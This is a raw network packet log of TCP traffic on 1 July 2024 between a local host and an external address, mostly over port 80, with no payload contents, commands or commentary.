Jul 1, 2024 09:16:16.073319912 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:16.073430061 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:16.073442936 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:16.073486090 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:16.073508024 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:16.073519945 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:16.073532104 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:16.073543072 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:16.073559046 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:16.073586941 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:16.074043036 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:16.074053049 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:16.074063063 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:16.074075937 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:16.074085951 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:16.074096918 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:16.074103117 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:16.074107885 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:16.074110985 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:16.074117899 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:16.074120045 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:16.074131966 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:16.074143887 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:16.074151039 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:16.074182034 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:16.074328899 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:16.074340105 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:16.074351072 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:16.074362040 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:16.074362993 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:16.074421883 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:16.074445963 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:16.074529886 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:16.074542046 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:16.074552059 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:16.074563980 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:16.074573994 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:16.074573994 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:16.074587107 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:16.074598074 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:16.074609041 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:16.074611902 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:16.074619055 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:16.074620962 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:16.074630976 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:16.074636936 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:16.074642897 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:16.074652910 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:16.074660063 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:16.074671030 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:16.074680090 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:16.074681044 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:16.074692011 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:16.074703932 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:16.074707031 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:16.074716091 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:16.074723959 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:16.074727058 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:16.074738979 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:16.074744940 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:16.074750900 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:16.074762106 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:16.074764013 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:16.074774027 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:16.074784994 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:16.074790001 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:16.074796915 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:16.074810982 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:16.074816942 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:16.074822903 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:16.074834108 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:16.074835062 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:16.074846983 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:16.074857950 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:16.074858904 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:16.074870110 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:16.074902058 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:16.074907064 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:16.074913025 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:16.074923038 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:16.074923992 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:16.074935913 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:16.074947119 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:16.074949980 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:16.074973106 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:16.074990988 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:16.075145006 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:16.075156927 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:16.075175047 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:16.075186014 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:16.075191021 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:16.075196981 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:16.075207949 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:16.075216055 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:16.075220108 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:16.075231075 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:16.075234890 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:16.075242043 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:16.075253963 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:16.075259924 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:16.075263977 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:16.075269938 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:16.075282097 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:16.075283051 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:16.075294018 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:16.075303078 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:16.075310946 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:16.075320959 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:16.075324059 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:16.075335979 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:16.075345993 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:16.075350046 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:16.075357914 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:16.075371027 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:16.075378895 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:16.075401068 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:16.075423002 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:16.076035976 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:16.076052904 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:16.076064110 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:16.076073885 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:16.076083899 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:16.076096058 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:16.076105118 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:16.076107025 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:16.076117992 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:16.076128960 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:16.076133013 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:16.076141119 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:16.076145887 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:16.076152086 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:16.076152086 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:16.076158047 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:16.076163054 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:16.076168060 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:16.076174021 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:16.076179028 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:16.076184988 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:16.076188087 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:16.076193094 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:16.076251984 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:16.076848030 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:16.076860905 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:16.076885939 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:16.076910019 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:16.076997042 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:16.077009916 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:16.077022076 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:16.077028036 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:16.077038050 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:16.077049971 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:16.077059984 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:16.077063084 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:16.077071905 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:16.077084064 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:16.077085972 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:16.077095985 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:16.077104092 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:16.077106953 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:16.077117920 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:16.077120066 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:16.077130079 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:16.077147007 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:16.077172041 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:16.170183897 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:16.170217991 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:16.170228004 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:16.170294046 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:16.170305967 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:16.170306921 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:16.170317888 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:16.170331001 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:16.170357943 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:16.170383930 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:16.170394897 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:16.170404911 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:16.170417070 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:16.170428038 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:16.170439959 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:16.170439959 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:16.170450926 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:16.170461893 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:16.170463085 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:16.170473099 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:16.170480013 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:16.170484066 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:16.170497894 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:16.170505047 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:16.170535088 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:16.170552969 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:16.173314095 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:16.173326969 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:16.173337936 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:16.173348904 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:16.173361063 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:16.173366070 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:16.173371077 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:16.173382998 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:16.173384905 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:16.173393965 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:16.173404932 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:16.173414946 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:16.173439980 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:16.173460007 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:17.192300081 CEST	49747	50500	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:17.192711115 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:17.197179079 CEST	50500	49747	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:17.197664022 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:17.393166065 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:17.393259048 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:17.393723011 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:17.398874044 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:17.592195034 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:17.592216969 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:17.592231989 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:17.592272043 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:17.592298985 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:17.592303991 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:17.592319965 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:17.592334986 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:17.592350960 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:17.592356920 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:17.592366934 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:17.592384100 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:17.592410088 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:17.592597008 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:17.592612028 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:17.592627048 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:17.592643023 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:17.592649937 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:17.592658043 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:17.592674017 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:17.592679024 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:17.592694998 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:17.592724085 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:17.592880011 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:17.592895985 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:17.592911005 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:17.592926025 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:17.592932940 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:17.592941999 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:17.592947960 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:17.592957973 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:17.592973948 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:17.592981100 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:17.592997074 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:17.593025923 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:17.593547106 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:17.593563080 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:17.593578100 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:17.593591928 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:17.593595028 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:17.593609095 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:17.593616962 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:17.593650103 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:17.593836069 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:17.593852043 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:17.593892097 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:17.593903065 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:17.593919039 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:17.593935013 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:17.593939066 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:17.593972921 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:17.594084024 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:17.594099045 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:17.594120026 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:17.594135046 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:17.594146967 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:17.594151974 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:17.594170094 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:17.594177008 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:17.594188929 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:17.594208956 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:17.594232082 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:17.594253063 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:17.594268084 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:17.594290972 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:17.594322920 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:17.594358921 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:17.594373941 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:17.594388008 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:17.594403982 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:17.594413042 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:17.594419003 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:17.594434977 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:17.594444036 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:17.594449997 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:17.594456911 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:17.594465971 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:17.594480038 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:17.594494104 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:17.594494104 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:17.594510078 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:17.594516039 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:17.594532967 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:17.594568014 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:17.594688892 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:17.594711065 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:17.594726086 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:17.594741106 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:17.594744921 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:17.594755888 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:17.594763994 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:17.594770908 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:17.594790936 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:17.594801903 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:17.594860077 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:17.594875097 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:17.594890118 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:17.594892025 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:17.594904900 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:17.594918966 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:17.594923973 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:17.594933987 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:17.594938040 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:17.594949007 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:17.594964027 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:17.594969034 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:17.594978094 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:17.594985962 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:17.594991922 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:17.595006943 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:17.595015049 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:17.595022917 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:17.595036983 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:17.595040083 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:17.595055103 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:17.595068932 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:17.595114946 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:17.595827103 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:17.595843077 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:17.595864058 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:17.595873117 CEST	49752	80	192.168.2.4	77.105.132.27
